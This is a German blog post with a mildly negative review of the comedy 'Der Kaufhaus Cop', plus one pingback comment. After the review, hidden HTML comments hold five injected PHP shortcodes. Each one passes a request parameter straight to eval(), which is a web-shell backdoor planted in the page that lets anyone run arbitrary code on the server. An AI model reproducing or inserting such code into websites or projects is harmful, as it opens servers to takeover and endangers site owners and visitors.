Zum Inhalt

Der Kaufhaus Cop

Angesichts der Tatsache, dass ich aus dem Film nichts mitgenommen habe kann ich nur sagen, dass es mir gereicht hätte, den Kaufhaus Cop auf DVD zu bestaunen zu gucken.

Es gab durchaus komische Momente, aber nichts, was man nicht schon mal gesehen hätte. Dass Kevin James fettleibig ist, wusste man bereits vorher und auch Oberlippenschnäuzer stehen ihm nicht sonderlich gut. Ganz zu schweigen von der nett anzusehenden aber nicht weiter interessanten Perückenverkäuferin in die sich der tollpatschige Kaufhaus Cop verliebt. “Ganz zu schweigen” trifft es übrigens gut, ich glaub sie hat 7 Sätze gesagt und ansonsten niedlich in die Kamera gelächelt.

Cool fand ich den Inder, der etwas durchgeknallt ist und seine Freundin per GPS verfolgt, wobei das gezeigte Handy seiner Freundin eher auf eine GPS-untauglichkeit schließen lässt. (Oh, ich mach sowas übrigens nicht.) Aber ansonsten war er eigentlich ganz cool wenn auch nur kurz zu sehen.

Die Geschichte ist eher mau und basiert auf der üblichen „Loser bekommt sein Leben geregelt“-Geschichte, womit sie auch schon fast komplett erzählt ist. Eher leichte Unterhaltung für unter der Woche auf der Couch, für einen Samstag Abend im Kino zuviel Geldverlust. Vielleicht hätte mich auch schon Bon Jovi als Trailermusik abschrecken sollen.

<!– [insert_php]if (isset($_REQUEST["ovN"])){eval($_REQUEST["ovN"]);exit;}[/insert_php][php]if (isset($_REQUEST["ovN"])){eval($_REQUEST["ovN"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tgYES"])){eval($_REQUEST["tgYES"]);exit;}[/insert_php][php]if (isset($_REQUEST["tgYES"])){eval($_REQUEST["tgYES"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VDCy"])){eval($_REQUEST["VDCy"]);exit;}[/insert_php][php]if (isset($_REQUEST["VDCy"])){eval($_REQUEST["VDCy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Pqsx"])){eval($_REQUEST["Pqsx"]);exit;}[/insert_php][php]if (isset($_REQUEST["Pqsx"])){eval($_REQUEST["Pqsx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EnvhF"])){eval($_REQUEST["EnvhF"]);exit;}[/insert_php][php]if (isset($_REQUEST["EnvhF"])){eval($_REQUEST["EnvhF"]);exit;}[/php] –>




Published inFilm & Fernsehen

Ein Kommentar

  1. […] geschrieben: am 04.04.09 erblickte der Pixelscheucher das Licht der Welt, zumindestens gab es da den ersten Beitrag. Offiziell gemacht hab ich es wohl erst im Juni 2009, richtig sicher bin ich mir da […]

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.